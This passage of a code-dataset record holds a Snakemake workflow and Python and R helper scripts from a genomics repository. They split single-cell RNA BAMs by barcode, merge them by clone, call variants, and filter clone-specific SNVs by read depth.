expand(\"data/{dna_sample_name}/dna/variants/clone_specific_beds/{dna_sample_name}-clone_{clone}_SNVs.bed\", dna_sample_name = dna_sample_names, clone = clones)\n\ndna_depths = expand(\"data/{dna_sample_name}/dna/variants/clone_variant_depths/{dna_sample_name}_SNVs_from_clone_{snv_clone}_depth_in_clone_{bam_clone}.tsv\", dna_sample_name = dna_sample_names, snv_clone = clones, bam_clone = clones)\n\ndna_clone_specific_beds_filtered = expand(\"data/{dna_sample_name}/dna/variants/clone_specific_beds/{dna_sample_name}-clone_{clone}_SNVs_filtered.bed\", dna_sample_name = dna_sample_names, clone = clones)\n\n\n\nrna_cell_bams = expand(\"data/{rna_sample_name}/rna/bam/{rna_sample_name}_cell_{barcode}.bam\", \n rna_sample_name = rna_sample_names, barcode = cell_barcodes)\nrna_cell_pileup = expand(\"data/{rna_sample_name}/rna/variants/bcf_by_clone/{rna_sample_name}-cell_{barcode}_variants_for_clone_{clone}_in_{dna_sample_name}.bcf\", rna_sample_name = rna_sample_names, barcode = cell_barcodes, clone = clones, dna_sample_name = dna_sample_names)\nrna_cell_variants = expand(\"data/{rna_sample_name}/rna/variants/vcf_by_clone/{rna_sample_name}-cell_{barcode}_variants_for_clone_{clone}_in_{dna_sample_name}.vcf\", rna_sample_name = rna_sample_names, barcode = cell_barcodes, clone = clones, dna_sample_name = dna_sample_names)\ncollate_logs = expand(\"data/{rna_sample_name}/rna/variants/logs/{rna_sample_name}-cell_{barcode}_variants_for_clone_{clone}_in_{dna_sample_name}.txt\",\nrna_sample_name = rna_sample_names, barcode = cell_barcodes, clone = clones, dna_sample_name = dna_sample_names)\n\nclone_bam_merge_list = expand(\"data/{rna_sample_name}/rna/clone_merge_lists/bams_for_clone_{clone}.txt\",\nrna_sample_name = rna_sample_names, clone = clones)\nbams_merged = expand(\"data/{rna_sample_name}/rna/bam_merged/{rna_sample_name}_clone_{clone}.bam\", \nrna_sample_name = rna_sample_names, clone = clones)\nvcf_merged_by_clone = 
expand(\"data/{rna_sample_name}/rna/vcf_clone_merged/{rna_sample_name}_clone_{clone}.vcf\", \nrna_sample_name = rna_sample_names, clone = clones)\nmerged_beds = expand(\"data/{rna_sample_name}/rna/vcf_clone_merged/{rna_sample_name}_clone_{clone}.bed\",\nrna_sample_name = rna_sample_names, clone = clones)\nmerged_bed = expand(\"data/{rna_sample_name}/rna/vcf_clone_merged/{rna_sample_name}_all_clones.bed\", rna_sample_name = rna_sample_names, clone = clones)\nmerged_bed_sorted = expand(\"data/{rna_sample_name}/rna/vcf_clone_merged/{rna_sample_name}_all_clones_sorted.bed\", rna_sample_name = rna_sample_names, clone = clones)\n\n# vcf_on_all_clones = expand(\"data/{rna_sample_name}/rna/vcf_all_clone_merged/{rna_sample_name}_all_clones.vcf\",\n# rna_sample_name = rna_sample_names)\n# bams_merged_string = \" \".join(bams_merged)\n\nrule all:\n input:\n # dna_initial_snvs,\n # dna_clone_specific_beds_unfiltered,\n # dna_depths,\n # dna_clone_specific_beds_filtered,\n # rna_cell_pileup#,\n rna_cell_bams,\n clone_bam_merge_list,\n bams_merged,\n vcf_merged_by_clone,\n merged_beds,\n merged_bed_sorted\n # vcf_on_all_clones\n\n\n# RNA here -----------------\n\n\n\nrule split_rna_sam_on_barcode:\n input:\n \"data/{}/rna/bam_from_10x/{}_possorted_genome_bam.bam\".format(rna_sample_names, rna_sample_names)\n output:\n \"data/{rna_sample_name}/rna/bam/{rna_sample_name}_cell_{barcode}.bam\"\n shell:\n \"samtools view -h {input} | grep '^\\\\@\\\\|{wildcards.barcode}' | samtools view -Sb -o {output} -\"\n\nrule create_merge_lists:\n input:\n bams=rna_cell_bams,\n csv=\"data/{rna_sample_name}/rna/clone_assignments_{rna_sample_name}.csv\"\n output:\n \"data/{rna_sample_name}/rna/clone_merge_lists/bams_for_clone_{clone}.txt\"\n shell:\n \"python3 scripts/bams_for_merging.py --clone {wildcards.clone} --sample_name {wildcards.rna_sample_name} --input_csv {input.csv} > {output}\"\n\nrule merge_bams:\n input:\n \"data/{rna_sample_name}/rna/clone_merge_lists/bams_for_clone_{clone}.txt\"\n output:\n \"data/{rna_sample_name}/rna/bam_merged/{rna_sample_name}_clone_{clone}.bam\"\n shell:\n \"samtools merge -b {input} {output}\"\n\n\nrule rna_pileup_on_merged_bam:\n input:\n bams=\"data/{rna_sample_name}/rna/bam_merged/{rna_sample_name}_clone_{clone}.bam\",\n bed=\"data/{rna_sample_name}/rna/beds/highly_expressed_genes.bed\",\n ref=ref_genome\n output:\n \"data/{rna_sample_name}/rna/bcf_clone_merged/{rna_sample_name}_clone_{clone}.bcf\"\n shell:\n \"samtools mpileup -l {input.bed} -R -g -f {input.ref} {input.bam} > {output}\"\n\nrule rna_call_variants_by_clone:\n input:\n \"data/{rna_sample_name}/rna/bcf_clone_merged/{rna_sample_name}_clone_{clone}.bcf\"\n output:\n \"data/{rna_sample_name}/rna/vcf_clone_merged/{rna_sample_name}_clone_{clone}.vcf\"\n shell:\n \"bcftools call -c -v {input} > {output}\"\n\nrule merge_variants_to_bed:\n input:\n \"data/{rna_sample_name}/rna/vcf_clone_merged/{rna_sample_name}_clone_{clone}.vcf\"\n output:\n \"data/{rna_sample_name}/rna/vcf_clone_merged/{rna_sample_name}_clone_{clone}.bed\"\n shell:\n \"vcf2bed < {input} > {output}\"\n\nrule merge_all_merged_variants:\n input:\n merged_beds\n output:\n \"data/{rna_sample_name}/rna/vcf_clone_merged/{rna_sample_name}_all_clones.bed\"\n run:\n shell(\"rm -rf {output}\")\n for bed in merged_beds:\n shell(\"cat {bed} >> {output}\")\n\nrule sort_merged_variants:\n input:\n \"data/{rna_sample_name}/rna/vcf_clone_merged/{rna_sample_name}_all_clones.bed\"\n output:\n 
\"data/{rna_sample_name}/rna/vcf_clone_merged/{rna_sample_name}_all_clones_sorted.bed\"\n shell:\n \"bedtools sort -i {input} > {output}\"\n\n\n# rule rna_pileup_on_all_clone_merge:\n# input:\n# bams=bams_merged,\n# bed=\"data/{rna_sample_name}/rna/beds/highly_expressed_genes.bed\",\n# ref=ref_genome\n# output:\n# \"data/{rna_sample_name}/rna/bcf_all_clone_merged/{rna_sample_name}_all_clones.bcf\"\n# shell:\n# \"samtools mpileup -l {input.bed} -R -g -f {input.ref} {bams_merged_string} > {output}\"\n\n# rule rna_call_variants_on_all_clone_merged:\n# input:\n# \"data/{rna_sample_name}/rna/bcf_all_clone_merged/{rna_sample_name}_all_clones.bcf\"\n# output:\n# \"data/{rna_sample_name}/rna/vcf_all_clone_merged/{rna_sample_name}_all_clones.vcf\"\n# shell:\n# \"bcftools call -c -v {input} > {output}\"\n\n# rule rna_pileup:\n# input:\n# clone_bedfile=\"data/{dna_sample_name}/dna/variants/clone_specific_beds/{dna_sample_name}-clone_{clone}_SNVs_filtered.bed\",\n# bam=\"data/{rna_sample_name}/rna/bam/{rna_sample_name}_cell_{barcode}.bam\",\n# ref = ref_genome\n# output:\n# \"data/{rna_sample_name}/rna/variants/bcf_by_clone/{rna_sample_name}-cell_{barcode}_variants_for_clone_{clone}_in_{dna_sample_name}.bcf\"\n# shell:\n# \"samtools mpileup -l {input.clone_bedfile} -R -g -f {input.ref} {input.bam} > {output}\"\n\n# rule rna_call_variants:\n# input:\n# \"data/{rna_sample_name}/rna/variants/bcf_by_clone/{rna_sample_name}-cell_{barcode}_variants_for_clone_{clone}_in_{dna_sample_name}.bcf\"\n# output:\n# \"data/{rna_sample_name}/rna/variants/vcf_by_clone/{rna_sample_name}-cell_{barcode}_variants_for_clone_{clone}_in_{dna_sample_name}.vcf\"\n# shell:\n# \"bcftools call -c -v {input} > {output}\"\n\n# rule rna_collate_snvs:\n# input:\n# \"data/{rna_sample_name}/rna/variants/vcf_by_clone/{rna_sample_name}-cell_{barcode}_variants_for_clone_{clone}_in_{dna_sample_name}.vcf\"\n# output:\n# \"data/{rna_sample_name}/rna/variants/logs/{rna_sample_name}-cell_{barcode}_variants_for_clone_{clone}_in_{dna_sample_name}.txt\"\n# shell:\n# \"\"\"\n# Rscript scripts/parse_vcf.R --input_vcf {input} --cell_barcode {wildcards.barcode} --clone {wildcards.clone} >> data/{wildcards.rna_sample_name}/rna/variants/cell_snps.csv\n# touch {output}\n# \"\"\"\n\n\n\n# DNA specific analysis here ------\n\nrule dna_pileup:\n input:\n bamfile = \"data/{dna_sample_name}/dna/bam/{dna_sample_name}-cluster_{clone}.sorted.realigned.rmdups.bam\",\n ref = ref_genome\n output:\n \"data/{dna_sample_name}/dna/variants/bcf/{dna_sample_name}-clone_{clone}_variants.bcf\"\n shell:\n \"samtools mpileup -R -g -f {input.ref} {input.bamfile} > {output}\"\n\nrule dna_bcf_to_vcf:\n input:\n \"data/{dna_sample_name}/dna/variants/bcf/{dna_sample_name}-clone_{clone}_variants.bcf\"\n output:\n \"data/{dna_sample_name}/dna/variants/vcf/{dna_sample_name}-clone_{clone}_variants.vcf\"\n shell:\n \"bcftools call -c -v {input} > {output}\"\n\nrule dna_vcf_to_bed:\n input:\n \"data/{dna_sample_name}/dna/variants/vcf/{dna_sample_name}-clone_{clone}_variants.vcf\"\n output:\n \"data/{dna_sample_name}/dna/variants/bed_initial_snvs/{dna_sample_name}-clone_{clone}_variants.bed\"\n shell:\n \"vcf2bed < {input} > {output}\"\n\nrule temp_intersect:\n input:\n bedA = \"data/{dna_sample_name}/dna/variants/bed_initial_snvs/{dna_sample_name}-clone_A_variants.bed\",\n bedB = \"data/{dna_sample_name}/dna/variants/bed_initial_snvs/{dna_sample_name}-clone_B_variants.bed\"\n output:\n \"data/{dna_sample_name}/dna/variants/tmp_intersect/SA501X3F-intersect_AB.bed\"\n shell:\n \"bedtools 
intersect -a {input.bedA} -b {input.bedB} > {output}\"\n\nrule germline_intersect:\n input:\n bedAB = \"data/{dna_sample_name}/dna/variants/tmp_intersect/SA501X3F-intersect_AB.bed\",\n bedC = \"data/{dna_sample_name}/dna/variants/bed_initial_snvs/{dna_sample_name}-clone_A_variants.bed\"\n output:\n \"data/{dna_sample_name}/dna/variants/germline_intersect/{dna_sample_name}-germline_SNVs.bed\"\n shell:\n \"bedtools intersect -a {input.bedAB} -b {input.bedC} > {output}\"\n\nrule clone_specific_beds:\n input:\n bed = \"data/{dna_sample_name}/dna/variants/bed_initial_snvs/{dna_sample_name}-clone_{clone}_variants.bed\",\n germline = \"data/{dna_sample_name}/dna/variants/germline_intersect/{dna_sample_name}-germline_SNVs.bed\"\n output:\n \"data/{dna_sample_name}/dna/variants/clone_specific_beds/{dna_sample_name}-clone_{clone}_SNVs.bed\"\n shell:\n \"bedtools subtract -a {input.bed} -b {input.germline} > {output}\"\n\nrule dna_depth:\n input:\n snvs = \"data/{dna_sample_name}/dna/variants/clone_specific_beds/{dna_sample_name}-clone_{snv_clone}_SNVs.bed\",\n bam = \"data/{dna_sample_name}/dna/bam/{dna_sample_name}-cluster_{bam_clone}.sorted.realigned.rmdups.bam\"\n output:\n \"data/{dna_sample_name}/dna/variants/clone_variant_depths/{dna_sample_name}_SNVs_from_clone_{snv_clone}_depth_in_clone_{bam_clone}.tsv\"\n shell:\n \"samtools depth -b {input.snvs} {input.bam} > {output}\"\n\nrule filter_beds:\n input:\n bed=\"data/{dna_sample_name}/dna/variants/clone_specific_beds/{dna_sample_name}-clone_{clone}_SNVs.bed\",\n depth=dna_depths\n output:\n \"data/{dna_sample_name}/dna/variants/clone_specific_beds/{dna_sample_name}-clone_{clone}_SNVs_filtered.bed\"\n shell:\n \"\"\"\n rm -f {output}\n python3 scripts/filter_snv.py --input_bed {input.bed} --depth_template data/{wildcards.dna_sample_name}/dna/variants/clone_variant_depths/{wildcards.dna_sample_name}_SNVs_from_clone_{wildcards.clone}_depth_in_clone_CLONE.tsv --clone {wildcards.clone} --output_bed {output}\n \"\"\"\n\n\n# python scripts/filter_snv.py --input_bed data/SA501X3F/dna/variants/clone_specific_beds/SA501X3F-clone_C_SNVs.bed --depth_template data/SA501X3F/dna/variants/clone_variant_depths/SA501X3F_SNVs_from_clone_C_depth_in_clone_CLONE.tsv --clone C --output_bed tmp.bed\n\n\n# rule rna_pileup:\n# input: \n# bamfile = \"data/rna/bam/{sample_name}_cell_{barcode}.bam\",\n# ref = ref_genome\n# output:\n# \"data/rna/variants/bcf/{sample_name}-cell_{barcode}_variants.bcf\"\n# shell:\n# \"samtools mpileup -R -g -f {input.ref} {input.bamfile} > {output}\"\n\n# rule rna_bcf_to_vcf:\n# input:\n# \"data/rna/variants/bcf/{sample_name}-cell_{barcode}_variants.bcf\"\n# output:\n# \"data/rna/variants/vcf/{sample_name}-cell_{barcode}_variants.vcf\"\n# shell:\n# \"bcftools call -c -v {input} > {output}\"\n\n\n\n# rule split_rna_sam_on_barcode:\n# input:\n# \"data/rna/bam_from_10x/{}_possorted_genome_bam.bam\".format(rna_sample_name)\n# output:\n# rna_cell_bams\n# shell:\n# \"\"\"\n# samtools view data/rna/bam_from_10x/SA501X2B_possorted_genome_bam.bam | head | awk -F \"\\t\" 'match($0, /CB:Z:[ACGT]-1/) {if (RSTART>0){OUTPUT=substr($0,RSTART+5,18); print $0 >> \"data/rna/bam/\"OUTPUT\".sam\"}}'\n# samtools view -H data/rna/bam_from_10x/SA501X2B_possorted_genome_bam.bam > tmp_header.sam\n# for f in data/rna/sam/*.sam\n# do\n# b=`basename $f .sam`\n# cat tmp_header.sam $f.sam | samtools view -b - > $b.bam\n# done\n# \"\"\"\n\n# rule rna_bam_to_fastq:\n# input:\n# \"data/rna/bam/{sample_name}_cell_{barcode}.bam\"\n# output:\n# 
\"data/rna/fastq/{sample_name}_cell_{barcode}.fastq\"\n# shell:\n# \"bedtools bamtofastq -i {input} -fq {output}\"\n\n# rule star_index:\n# input:\n# ref_genome\n# output:\n# \"data/rna/star_index/genomeParameters.txt\"\n# shell:\n# \"STAR --runMode genomeGenerate --genomeDir data/rna/star_index --genomeFastaFiles {input}\"\n\n# rule rna_realign:\n# input:\n# fastq = \"data/rna/fastq/{sample_name}_cell_{barcode}.fastq\",\n# star_index = \"data/rna/star_index/genomeParameters.txt\"\n# output:\n# \"data/rna/bam_realigned/{sample_name}_cell_{barcode}.bam\"\n# shell:\n# \"STAR --genomeDir data/rna/star_index --readFilesIn {input.fastq}\"\n\n\n" }, { "alpha_fraction": 0.5923792719841003, "alphanum_fraction": 0.6154186725616455, "avg_line_length": 26.66666603088379, "blob_id": "9a1542553f8ae80b4e2299f4d87a078e0584629e", "content_id": "bd7e5b71ae60738387e1f230a4eb4674472181d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2257, "license_type": "no_license", "max_line_length": 114, "num_lines": 81, "path": "/scripts/get_read_depth.py", "repo_name": "kieranrcampbell/clonealign-snv-analysis", "src_encoding": "UTF-8", "text": "# coding: utf-8\nimport subprocess\nimport pandas as pd\nimport numpy as np\nfrom scipy.stats import binom\nimport vcf\nimport gzip\nimport argparse\n\nfrom joblib import Parallel, delayed\n\n\n\ndef get_depth(chr, snv_pos, file):\n arg = \"{}:{}-{}\".format(chr, snv_pos, snv_pos)\n\n result = subprocess.check_output(['samtools', 'depth', '-r', arg, file])\n result = result.decode(\"utf-8\")\n\n depth = -1\n if len(result) == 0:\n depth = '0'\n else:\n depth = result.split(\"\\t\")[2].strip()\n\n return depth\n\ndef wrap_depth_function(series, clone):\n path = 'path' + clone\n return get_depth(series['chr'], series['pos'], series[path])\n\ndef filter_record(bam_1, bam_2, record):\n chr = record[0]\n pos = record[1] \n af1 = record[2]\n af1 = round(af1 / 0.5) * 0.5 # Round to nearest .5\n depth1 = float(get_depth(chr, pos, bam_1))\n depth2 = float(get_depth(chr, pos, bam_2))\n\n p = af1\n if p == 1.0:\n p = 0.99\n\n pval1 = binom.cdf(0, depth1, p)\n pval2 = binom.cdf(0, depth2, p)\n\n if pval1 < 0.05 and pval2 < 0.05:\n return \"{}_{}\".format(chr, pos)\n else:\n return None\n\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input_vcf\")\n parser.add_argument(\"--bam_template\")\n parser.add_argument(\"--clone\")\n parser.add_argument(\"--output_vcf\")\n args = parser.parse_args()\n\n readdepth_clones = list(set([\"A\", \"B\", \"C\"]) - set(args.clone))\n bam_1 = args.bam_template.replace(\"CLONE\", readdepth_clones[0])\n bam_2 = args.bam_template.replace(\"CLONE\", readdepth_clones[1])\n\n vcf_reader = vcf.Reader(open(args.input_vcf, 'rb'))\n vcf_writer = vcf.Writer(open(args.output_vcf, 'w'), vcf_reader)\n\n records = [[record.CHROM, record.POS, float(record.INFO['AF1'])] for record in vcf_reader]\n keys = [\"{}_{}\".format(record.CHROM, record.POS) for record in vcf_reader]\n\n record_dict = dict(zip(keys, [record for record in vcf_reader]))\n\n\n passed_record_keys = Parallel(n_jobs = 20)(delayed(filter_record)(bam_1, bam_2, record) for record in records)\n\n passed_record_keys = [x for x in passed_record_keys if x is not None]\n\n for key in passed_record_keys:\n vcf_writer.write_record(record_dict[key])\n \n\n\n \n\n\n\n\n" }, { "alpha_fraction": 0.5751730799674988, "alphanum_fraction": 0.6013847589492798, "avg_line_length": 33.55172348022461, "blob_id": 
"6615c7e32d85744bf547ab4cbcefdc3a8e3ace14", "content_id": "697d77a7a38f41f7fa145aa85571539d00e17292", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2022, "license_type": "no_license", "max_line_length": 118, "num_lines": 58, "path": "/scripts/filter_snv.py", "repo_name": "kieranrcampbell/clonealign-snv-analysis", "src_encoding": "UTF-8", "text": "# coding: utf-8\nimport pandas as pd\nimport numpy as np\nfrom scipy.stats import binom\nimport argparse\n\n\n\n\ndef test_row(row):\n af1 = row['af1']\n depth1 = row['depth1']\n depth2 = row['depth2']\n p = af1\n if p == 1.0:\n p = 0.99\n pval1 = binom.cdf(0, depth1, p)\n pval2 = binom.cdf(0, depth2, p)\n return pval1 < 0.05 and pval2 < 0.05\n\ndef parse_info(AF_line):\n split = AF_line.split(\";\")\n af1_text = [x for x in split if \"AF1\" in x][0]\n af1 = float(af1_text.split(\"=\")[1])\n return af1\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input_bed\")\n parser.add_argument(\"--depth_template\")\n parser.add_argument(\"--clone\")\n parser.add_argument(\"--output_bed\")\n args = parser.parse_args()\n\n readdepth_clones = list(set([\"A\", \"B\", \"C\"]) - set(args.clone))\n depth_1_file = args.depth_template.replace(\"CLONE\", readdepth_clones[0])\n depth_2_file = args.depth_template.replace(\"CLONE\", readdepth_clones[1])\n\n df_1 = pd.read_csv(depth_1_file, sep = \"\\t\", header = None, names = [\"chrom\", \"chromEnd\", \"depth\" + \"1\"])\n df_2 = pd.read_csv(depth_2_file, sep = \"\\t\", header = None, names = [\"chrom\", \"chromEnd\", \"depth\" + \"2\"])\n\n # Parse input\n names = ['chrom', 'chromStart', 'chromEnd', 'strand', 'score', 'ref', 'alt', 'alt_strand', 'allele_info', 'info1']\n input_bed_df = pd.read_csv(args.input_bed, sep = \"\\t\", header = None, names = names, index_col = False)\n input_bed_df['af1'] = input_bed_df.allele_info.apply(parse_info)\n\n df_merged = pd.merge(input_bed_df, df_1, how = 'left', on = ['chrom', 'chromEnd'])\n df_merged = pd.merge(df_merged, df_2, how = 'left', on = ['chrom', 'chromEnd'])\n\n df_merged.depth1.fillna(0, inplace = True)\n df_merged.depth2.fillna(0, inplace = True)\n\n keep_variant = df_merged.apply(test_row, axis = 1)\n\n df_merged = df_merged.loc[keep_variant]\n\n df_merged.to_csv(args.output_bed, sep = \"\\t\", columns = names, index = False, header = False)\n\n\n \n\n\n \n\n\n\n\n" }, { "alpha_fraction": 0.6505190134048462, "alphanum_fraction": 0.6522491574287415, "avg_line_length": 26.5238094329834, "blob_id": "057258e4e7e44a8839ca0184615116a73e8b9526", "content_id": "931c47f747fd553a6075ba5354d70fa61f686d5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 578, "license_type": "no_license", "max_line_length": 122, "num_lines": 21, "path": "/scripts/bams_for_merging.py", "repo_name": "kieranrcampbell/clonealign-snv-analysis", "src_encoding": "UTF-8", "text": "# coding: utf-8\n\nimport pandas as pd\nimport argparse\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input_csv\")\n parser.add_argument(\"--sample_name\")\n parser.add_argument(\"--clone\")\n args = parser.parse_args()\n\n clone_assign_df = pd.read_csv(args.input_csv)\n\n bcodes = clone_assign_df.loc[clone_assign_df.clone == args.clone].barcode\n\n barcodes = list(bcodes)\n\n paths = [\"data/{}/rna/bam/{}_cell_{}.bam\".format(args.sample_name, args.sample_name, barcode) for barcode in barcodes]\n\n 
print(\"\\n\".join(paths))\n" }, { "alpha_fraction": 0.6146953701972961, "alphanum_fraction": 0.6218637824058533, "avg_line_length": 30, "blob_id": "076f01082798f7002a00907983fb5d9d0d9a56f0", "content_id": "0334959d524cda6c7b4f8c108ea82c485a77158e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 558, "license_type": "no_license", "max_line_length": 62, "num_lines": 18, "path": "/scripts/parse_vcf.R", "repo_name": "kieranrcampbell/clonealign-snv-analysis", "src_encoding": "UTF-8", "text": "suppressPackageStartupMessages(library(VariantAnnotation))\nsuppressPackageStartupMessages(library(dplyr))\nsuppressPackageStartupMessages(library(aargh))\n\nparse_vcf <- function(input_vcf = \"input.vcf\",\n cell_barcode = \"cell_barcode\",\n clone = \"A\") {\n vcf <- readVcf(input_vcf, \"hg19\")\n snvs <- names(ranges(vcf))\n if(length(snvs) > 0) {\n snv_txt <- sapply(snvs, function(snv) {\n paste(cell_barcode, clone, paste0(snv, \"\\n\"), sep = \",\")\n })\n cat(paste(snv_txt, collapse = \"\"))\n }\n}\n\naargh(parse_vcf)\n" } ]
5
echowell/nimrodscripts
https://github.com/echowell/nimrodscripts
cd1daf77927299ec367707f94ae8b4376e69e172
0b5747032aff1183a02d2693e9959928bae22c33
e9499dd08892fb2bfd1fa74e92d296bcf3830b10
refs/heads/master
2022-11-07T11:46:24.341517
2022-10-28T20:41:20
2022-10-28T20:41:20
167,447,931
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6597998738288879, "alphanum_fraction": 0.6933490037918091, "avg_line_length": 35.956520080566406, "blob_id": "db30c0fdf1d5992facb6268e8e0cd3a10d094f6e", "content_id": "7a1a5e4113c49acd6afe58b38e670e1a8bedfd84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1699, "license_type": "no_license", "max_line_length": 111, "num_lines": 46, "path": "/trip2Nim/tripInterpolate.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\n''' Intepolate B(R,Z,PHI) from one set of RZ points onto a second set.\n\n Both set's of RZ points are assumed to be on the same surface.\n First: Read NIMROD wall file and the RZ points are Fouier Transformed\n Second: Read TRIP3D files, and Fourier transform B\n Third: Read new RZ locations, and find theta of this coordinates\n Finally: Interpolate B onto new coordinates\n'''\n\nimport sys\nsys.path.insert(0, \"./\")\nimport os\nimport nim_wall as wall\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nhome_dir = os.environ['HOME']\nscratch_dir = home_dir + \"/SCRATCH\"\nfile_dir = scratch_dir + \"/166439/03300_2_equilbria/19061201\"\nwall_file = \"wall_file_2.txt\"\nfull_wall_file_path = file_dir + \"/\" + wall_file\nnew_rz_file = \"nimrod_bdry_rz.txt\"\nfull_new_rz_file_path = file_dir + \"/\" + new_rz_file\nfull_wall_file_path = \"/home/research/ehowell/SCRATCH/166439/03300_q104_flowtesting/flow_60/nimrod_bdry_rz.txt\"\nwall_modes = -1\n\nthis_wall = wall.NimrodWall(full_wall_file_path, wall_modes)\n\nnew_rz = np.loadtxt(full_new_rz_file_path, delimiter=',', skiprows=1)\n#old_rz = np.loadtxt(full_old_rz_file_path, delimiter=',', skiprows=1)\nnew_theta = np.zeros(new_rz.shape[0])\nerr_theta = np.zeros(new_rz.shape[0])\nfor ix in range(new_rz.shape[0]):\n new_theta[ix], err_theta[ix] = this_wall.get_theta_rz(new_rz[ix,0],new_rz[ix,1])\nprint (new_theta)\nprint (err_theta)\n\n\nplt.plot(this_wall.file_rz[:,0],this_wall.file_rz[:,1], 'bo', label=\"Orginal Wall\")\nplt.plot(this_wall.rz_wall[:,0],this_wall.rz_wall[:,1], 'g-', label=\"Smooth Wall\")\nplt.plot(new_rz[:,0],new_rz[:,1],'k', label=\"New Rz\")\n#plt.plot(old_rz[:,0],old_rz[:,1],'g', label=\"Old Rz\")\nplt.legend(loc=1)\nplt.show()" }, { "alpha_fraction": 0.6840182542800903, "alphanum_fraction": 0.7196347117424011, "avg_line_length": 21.83333396911621, "blob_id": "ec577eac2bd624a15c43c6732f678d70877bdb28", "content_id": "27c6c86f450f00685f74beca47bf65a12eb1bf7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1095, "license_type": "no_license", "max_line_length": 69, "num_lines": 48, "path": "/transport_calculator/neoclassical_coeff.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n\nimport numpy as np\nimport plasma_constants as pc\n\n\n### set background plasma parameters\nne = 6.82e19 #m^-3\nte = 1504. #eV\nti = 1754. 
#eV\nzeff = 3.25\nni = 3.49e19 #m^-3 rough guess\n\nepsilon = 0.25 # magnetic inverse aspect ratio\nR0 = 1.696\nq0 = 2.0\n\n#calcularte classical values for electrons and ions with impurities\n#here I assume the the Coulomb Log is the same for both electron and \n#ions\nlogLam = pc.coulombLog(te,ne)\nnu_e = pc.nu_e(ne,te,zeff,logLam)\nvte = pc.vte(te)\nlambda_e = vte/nu_e\nzStar=pc.zStar(ne,ni,zeff)\nnu_i = pc.nu_i(ni,ti,pc.md,zStar,logLam)\nvti = pc.vts(ti,pc.md) \nlambda_i = vti/nu_i\n\nfc = pc.circulatingFraction(epsilon)#circuling fraction\nnueBanana = pc.nuBanana(nu_e,epsilon)\nnuiBanana = pc.nuBanana(nu_i,epsilon)\n\nnueStar = pc.nuStar(R0,q0,epsilon,lambda_e)\nnuiStar = pc.nuStar(R0,q0,epsilon,lambda_i)\nmu_e = pc.neoMue(nu_e,nueStar,zeff,epsilon)\nmu_i = pc.neoMue(nu_i,nuiStar,zStar,epsilon)\nprint(logLam)\nprint(nu_e)\nprint(nu_i)\nprint (lambda_e)\nprint (lambda_i)\nprint(nu_i/nu_e)\nprint(fc)\nprint(nueStar)\nprint(nuiStar)\nprint(mu_e)\nprint(mu_i)" }, { "alpha_fraction": 0.5484074950218201, "alphanum_fraction": 0.5910642147064209, "avg_line_length": 38.26551055908203, "blob_id": "195ce0a350b71c56aa6bb25a982d00df0f3712b0", "content_id": "7518a63b8377c8120f23a47145f00c800c7a6a24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15824, "license_type": "no_license", "max_line_length": 106, "num_lines": 403, "path": "/hocradic/hcPlot.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#\n#\nimport os\nimport h5py\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\nimport pickle\nimport glob\nfrom shutil import copy2\nimport hcStep as step\nimport nim_timer as nimtime\nimport matplotlib.colors as mcolors\n\n\ndef pickle_sort(file):\n #print(file[5:],file.split('.'))\n return int(file.split('.')[1])\n\ndef find_files(thisdir):\n ''' This fuction finds the hc, dump files in the directory\n input: thisdir\n output: hc filename, dumpfilename, stepnumber, step time\n the outputs return None, if a file does not exists\n '''\n dumpfile=None\n nimrodin=None\n listobjs = os.listdir(thisdir)\n for iobj in listobjs:\n wordlist = iobj.split('.')\n if (wordlist[0].lower()=='dumpgll' and wordlist[-1]=='h5'):\n if (dumpfile==None):\n dumpfile=iobj\n else:\n print(f\"Multiple dumpfiles in directory {thisdir}\")\n raise\n elif (iobj=='nimrod.in'):\n nimrodin=iobj\n\n return dumpfile, nimrodin\n\ndef hcplot(args):\n pickle_suf=[\"pickle\"]\n pickle_pre=[\"power\"]\n steplist = []\n nmode_list = [1,2,3,4,5]\n color_list = ['tab:blue','tab:green','tab:red','tab:purple','tab:brown']\n times = None\n if args['read']:\n pickle_list=glob.glob(\"power.*\")\n pickle_list.sort(key=pickle_sort)\n time_steps = len(pickle_list)\n times = np.zeros(time_steps)\n nmodes = len(nmode_list)\n mag_energy = np.zeros([time_steps,nmodes])\n kin_energy = np.zeros([time_steps,nmodes])\n lin_power = np.zeros([time_steps,nmodes])\n qua_power = np.zeros([time_steps,nmodes])\n non_power = np.zeros([time_steps,nmodes])\n ohm_power = np.zeros([time_steps,nmodes])\n visc_power = np.zeros([time_steps,nmodes])\n neoi_power = np.zeros([time_steps,nmodes])\n neoe_power = np.zeros([time_steps,nmodes])\n poyn_power = np.zeros([time_steps,nmodes])\n press_power = np.zeros([time_steps,nmodes])\n adv_power = np.zeros([time_steps,nmodes])\n total_power = np.zeros([time_steps,nmodes])\n# adv_power = np.zeros([time_steps,nmodes])\n if len(pickle_list)>0:\n for ii, file in enumerate(pickle_list):\n print(file)\n 
